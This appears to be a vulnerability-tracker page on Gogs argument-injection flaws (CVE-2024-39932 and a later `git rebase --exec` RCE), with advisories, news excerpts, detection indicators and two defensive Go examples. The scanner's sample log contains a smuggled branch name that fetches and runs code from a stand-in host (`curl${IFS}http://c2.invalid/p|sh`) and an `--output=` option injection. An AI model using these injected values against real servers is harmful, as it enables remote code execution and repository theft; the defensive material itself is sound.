CVE-2024-39932
Published 2024-07-04
Gogs through 0.13.0 allows argument injection during the previewing of changes.
Priority P271 · critical · 9.9 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS: 17.18% (96.7th percentile)
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | gogs_gogs | 0 – 0.13.0 | — |
| gogs.io | gogs | >= 0 < 0.13.1 | 0.13.1 |
| gogs.io | gogs | >= 0 < 0.14.3 | 0.14.3 |
| gogs | gogs | <= 0.13.0 | — |
Detection & IOCs (extracted from sources)
Note: the indicators below come from the later `git rebase --exec` advisory quoted further down (GHSA, CVE-2026-52806), which concerns pull request merge with "Rebase before merging", not the diff-preview argument injection tracked as CVE-2024-39932. The CVE-2024-39932 advisory itself lists no workaround beyond restricting accounts to trusted users and upgrading to 0.13.1.
- Detect HTTP 500 responses from the Gogs server coinciding with pull request merge operations: the injected command runs during the git rebase step, before the merge aborts with a 500, so the 500 is a post-exploitation artifact rather than a sign that the attack failed.
- Alert on git branch names or PR base-branch parameters beginning with `--exec=` in Gogs HTTP request logs or database entries; this is the injection prefix that turns `git rebase` into a command runner.
- Monitor `git rebase` process invocations on the Gogs server for command-line arguments containing `--exec=`, especially those spawning `sh -c` child processes; this is the execution primitive.
- Detect `${IFS}` in branch names or PR parameters: the shell expands it to whitespace, which is how an attacker gets spaces into a command despite Git forbidding spaces in branch names.
- Monitor for new user account creation followed immediately by repository creation and enabling of "Rebase before merging" (PullsAllowRebase) on instances with open registration; this is the self-contained unauthenticated-to-RCE chain.
- The exploit is fully automatable (a Metasploit module exists); correlate rapid sequential HTTP requests for account creation, repository creation, branch push and PR merge on Gogs endpoints as a behavioral indicator.
- Gogs ships with open registration enabled by default, so any unauthenticated visitor can create an account and exploit this without admin interaction. Disabling registration (`DISABLE_REGISTRATION = true` in app.ini) is the most impactful mitigation.
- On Docker installations the Gogs process runs as the git user (UID 1000 by default), giving a successful attacker filesystem-level read/write access to every repository under the single REPOSITORY_ROOT directory, with no OS-level isolation between repositories.
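The indicators above, turned into a small log scanner as an added example (this is not code from the page, from Gogs or from Rapid7). It generalizes the `--exec=` and `${IFS}` checks to any option-like value in a ref parameter, which is the argument-injection class CVE-2024-39932 also belongs to. The record format, the parameter names `base`/`head`/`branch` and the sample lines are constructed for the example; real Gogs logs do not record request parameters in this shape, so the parser would need adapting to an actual log or audit source.

```go
package main

import (
	"fmt"
	"strings"
)

// Finding is one suspicious event, keyed to its line number in the input.
type Finding struct {
	Line     int
	Severity string
	Reason   string
}

// refParams are request fields whose value the server hands to git as a ref or
// branch name. The names are assumed for this example; map them to the real schema.
var refParams = []string{"base", "head", "branch"}

// sampleLog is constructed for this example (not real Gogs output). Each line is
// either an HTTP request record (kind=http) or a process-audit record (kind=proc).
var sampleLog = []string{
	`kind=http ts=2026-05-28T10:00:01Z user=mallory method=GET path=/mallory/r/compare base=main head=--output=/tmp/x status=200`,
	`kind=http ts=2026-05-28T10:00:05Z user=mallory method=POST path=/mallory/r/pulls/1/merge merge_style=rebase base=main head="--exec=curl${IFS}http://c2.invalid/p|sh" status=500`,
	`kind=proc ts=2026-05-28T10:00:05Z uid=1000 cmd="git rebase --exec=curl${IFS}http://c2.invalid/p|sh main" child="sh -c curl http://c2.invalid/p|sh"`,
	`kind=http ts=2026-05-28T10:01:00Z user=alice method=POST path=/alice/r/pulls/2/merge merge_style=merge base=main head=feature status=200`,
}

// parseKV splits space-separated key=value pairs; a value may be double-quoted to
// contain spaces. Quotes are not escaped, which is enough for this record format.
func parseKV(line string) map[string]string {
	kv := map[string]string{}
	var key, val strings.Builder
	inKey, quoted := true, false
	flush := func() {
		if key.Len() > 0 {
			kv[key.String()] = val.String()
		}
		key.Reset()
		val.Reset()
		inKey = true
	}
	for _, r := range line {
		switch {
		case r == '"' && !inKey:
			quoted = !quoted
		case r == ' ' && !quoted:
			flush()
		case r == '=' && inKey:
			inKey = false
		case inKey:
			key.WriteRune(r)
		default:
			val.WriteRune(r)
		}
	}
	flush()
	return kv
}

// inspectValue classifies a single user-supplied ref value. The --exec and ${IFS}
// checks are the specific indicators from the rebase advisory; the leading-dash
// check is the general argument-injection class, which also covers refs that end
// up in git diff as in CVE-2024-39932.
func inspectValue(name, v string) (severity, reason string, hit bool) {
	switch {
	case strings.HasPrefix(v, "--exec="):
		return "critical", fmt.Sprintf("%s=%q injects --exec into git rebase", name, v), true
	case strings.Contains(v, "${IFS}"):
		return "high", fmt.Sprintf("%s=%q smuggles a space into a branch name via ${IFS}", name, v), true
	case strings.HasPrefix(v, "-"):
		return "high", fmt.Sprintf("%s=%q is option-like and would be parsed by git as a flag", name, v), true
	}
	return "", "", false
}

// scan walks the records and returns findings in input order.
func scan(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		n, kv := i+1, parseKV(line)
		switch kv["kind"] {
		case "http":
			for _, p := range refParams {
				if v, present := kv[p]; present {
					if sev, why, hit := inspectValue(p, v); hit {
						out = append(out, Finding{n, sev, why})
					}
				}
			}
			// A 500 on the merge endpoint is the post-exploitation artifact: the
			// rebase (and with it --exec) ran before the merge aborted.
			if kv["status"] == "500" && strings.HasSuffix(kv["path"], "/merge") {
				out = append(out, Finding{n, "medium", "HTTP 500 on pull request merge; correlate with rebase activity"})
			}
		case "proc":
			cmd := kv["cmd"]
			if strings.HasPrefix(cmd, "git rebase") && strings.Contains(cmd, "--exec") {
				sev := "high"
				if strings.Contains(kv["child"], "sh -c") {
					sev = "critical"
				}
				out = append(out, Finding{n, sev, "git rebase invoked with --exec: " + cmd})
			}
		}
	}
	return out
}

func main() {
	for _, f := range scan(sampleLog) {
		fmt.Printf("line %d [%s] %s\n", f.Line, f.Severity, f.Reason)
	}
}
```

On the constructed sample this reports the option-like ref on line 1, the `--exec=` branch plus the merge 500 on line 2, and the `git rebase --exec` process with its `sh -c` child on line 3; Alice's ordinary merge on line 4 produces nothing. The `${IFS}` rule never fires on its own here because the `--exec=` rule matches first; order the rules by how specific they are to your environment.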
CVSS provenance
- NVD: v3.1 9.9 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- GHSA: 9.9 CRITICAL
- OSV: 9.9 CRITICAL
GHSA · 2026-06-23 · CVE-2026-52806 [CRITICAL] CWE-77: Gogs vulnerable to RCE via git rebase --exec argument injection in pull request merge
# Gogs: RCE via `git rebase --exec` Argument Injection in PR Merge
## Summary
Gogs allows authenticated users to achieve Remote Code Execution (RCE) on the server by creating a pull request with a specially crafted branch name that injects the `--exec` flag into the `git rebase` command during the "Rebase before merging" merge operation.
## Severity
**Critical** - CVSS 3.1 Base Score: 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
## Affected Versions
- **Gogs 0.14.2** (latest supported release)
- Gogs 0.15.0+dev (commit `b53d3162`, main branch as of 2026-03-16)
- All prior versions that support the "Rebase before merging" merge style
## Impact
This is a **privilege escalation from authenticated user
OSV · 2024-12-23 · CVSS 9.9 · CVE-2024-39932 [CRITICAL]: Gogs allows argument injection during the previewing of changes
### Impact
Unprivileged user accounts can write to arbitrary files on the filesystem. We were able to demonstrate its exploitation to force a re-installation of the instance, granting administrator rights. It allows accessing and altering any user's code hosted on the same instance.
### Patches
Unintended Git options are now ignored for the diff preview (https://github.com/gogs/gogs/pull/7871). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.
### Workarounds
No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.
### References
https://www.cve.org/CVERecord?id=CVE-2024-39932
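The fix described above (ignore unintended git options in the diff preview) is one instance of a general rule: a request-controlled value must never land where git parses options. The Go example below is added here and is not Gogs' own code or its patch; it shows the anti-pattern beside a hardened form. `--output=<file>` is used only as an illustration of a `git diff` flag that writes a file; the advisory does not state which option was abused, and the function names are the example's own.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"strings"
)

// ErrOptionLikeArg is returned when a user-controlled value would be parsed by
// git as an option instead of as a revision.
var ErrOptionLikeArg = errors.New("user-controlled git argument would be parsed as an option")

// userRefAllowed rejects values git would read as options ("-p", "--output=...")
// and values that are empty or contain control characters. It does not validate
// ref syntax in full (git check-ref-format exists for that); its only job is the
// argument-injection check.
func userRefAllowed(v string) error {
	if v == "" {
		return errors.New("empty git argument")
	}
	if strings.HasPrefix(v, "-") {
		return fmt.Errorf("%w: %q", ErrOptionLikeArg, v)
	}
	for _, r := range v {
		if r < 0x20 || r == 0x7f {
			return fmt.Errorf("control character in git argument %q", v)
		}
	}
	return nil
}

// vulnerableDiffArgs mirrors the anti-pattern behind this bug class: revisions
// taken straight from the request are placed where git parses options, so a
// value like "--output=/tmp/x" becomes a flag rather than a ref.
func vulnerableDiffArgs(base, head string) []string {
	return []string{"diff", base, head}
}

// safeDiffArgs is the hardened form: each revision is checked, and "--" ends
// option parsing so that the pathspecs after it can never be read as flags.
// "--" does not protect the revisions before it, which is why the check on
// base and head is still required.
func safeDiffArgs(base, head string, paths []string) ([]string, error) {
	for _, ref := range []string{base, head} {
		if err := userRefAllowed(ref); err != nil {
			return nil, err
		}
	}
	args := []string{"diff", base, head, "--"}
	return append(args, paths...), nil
}

// runGitDiff executes git with a pre-built argument vector inside repoDir.
// Arguments are passed as a slice, never through a shell, so shell metacharacters
// in a ref cannot be interpreted; only git's own option parsing remains a risk.
func runGitDiff(repoDir string, args []string) (string, error) {
	cmd := exec.Command("git", args...)
	cmd.Dir = repoDir
	out, err := cmd.CombinedOutput()
	return string(out), err
}

func main() {
	for _, head := range []string{"feature", "--output=/tmp/x"} {
		args, err := safeDiffArgs("main", head, []string{"README.md"})
		fmt.Printf("head=%q -> args=%v err=%v\n", head, args, err)
	}
	fmt.Println("vulnerable form would run: git",
		strings.Join(vulnerableDiffArgs("main", "--output=/tmp/x"), " "))
}
```

Apply the same two measures (reject option-like refs, terminate options with `--` before pathspecs) to every git subcommand that receives request-controlled input, not just diff; newer git versions also accept `--end-of-options` in revision-walking commands, but verify support for the specific subcommand and git version before relying on it.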
GHSA · 2024-12-23 · CVSS 9.9 · CVE-2024-39932 [CRITICAL] CWE-94: Gogs allows argument injection during the previewing of changes
(Advisory text identical to the OSV entry above.)
OSV · 2024-07-09 · CVE-2024-39932: Gogs allows argument injection during the previewing of changes in github.com/gogs/gogs
OSV · 2024-07-04 · CVE-2024-39932 [CRITICAL]: Duplicate Advisory: Gogs allows argument injection during the previewing of changes
# Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9pp6-wq8c-3w2c. This link is maintained to preserve external references.
# Original Description
Gogs through 0.13.0 allows argument injection during the previewing of changes.
No detection rules found.
No public exploits indexed.
Bleepingcomputer · 2026-06-08 · CVE-2024-39933 (tag as shown on this page; the article itself says no CVE ID had been assigned)
## Gogs patches critical zero-day enabling remote code execution
By Sergiu Gatlan
Gogs has patched a critical security zero-day flaw that can allow attackers to compromise Internet-facing instances and access any repositories (including private ones).
This argument injection vulnerability has yet to be assigned a CVE ID, can only be exploited by authenticated attackers without admin privileges, and affects all Gogs releases up to and including 0.14.2 and 0.15.0+dev.
They can exploit this vulnerability to compromise the targeted server, read any repository (including private repos), steal credentials, move laterally to other systems on the network, and alter any hosted source code.
While threat actors would need at least basic user privileges to exploit the flaw, Rapid7 security resear
Rapid7 · 2026-05-28 · CVE-2024-39933 (tag as shown on this page; the post itself says no CVE ID had been assigned)
## Authenticated RCE via Argument Injection in Gogs (NOT FIXED)
## Overview
Rapid7 Labs discovered a critical argument injection (CWE-88) vulnerability in Gogs, a popular open-source self-hosted Git service. Rapid7 Labs scores this vulnerability as CVSS v4 9.4 (Critical). The vulnerability allows any authenticated user to achieve remote code execution (RCE) on the server by creating a pull request with a malicious branch name that injects the --exec flag into git rebase during the "Rebase before merging" merge operation. At the time of publication, the vendor has not released a patch.
The exploit requires no admin privileges and no interaction with other users; an attacker operates entirely within their own account. Since Gogs ships with open registration enabled by default ( DISABLE_REGISTRATION = false ) and no limit on repository creation ( MAX_
Bleepingcomputer · 2026-05-28 · CVSS 7.7 · CVE-2024-39933 [HIGH] (tag as shown on this page; the article itself says no CVE ID had been assigned)
## New Gogs zero-day flaw lets hackers get remote code execution
By Sergiu Gatlan
An unpatched zero-day vulnerability in the Gogs self-hosted Git service can allow attackers to gain remote code execution (RCE) on Internet-facing instances.
Designed as an alternative to GitHub Enterprise or GitLab and written in Go, Gogs is often exposed online for remote collaboration.
This critical severity argument injection security flaw has yet to be assigned a CVE ID, affects the latest release versions (Gogs 0.14.2 and 0.15.0+dev), and can only be exploited by authenticated attackers without admin privileges.
However, even though it requires basic user privileges to exploit, Rapid7 senior security researcher Jonah Burgess (who discovered the flaw) said the vulnerability affects all Gogs servers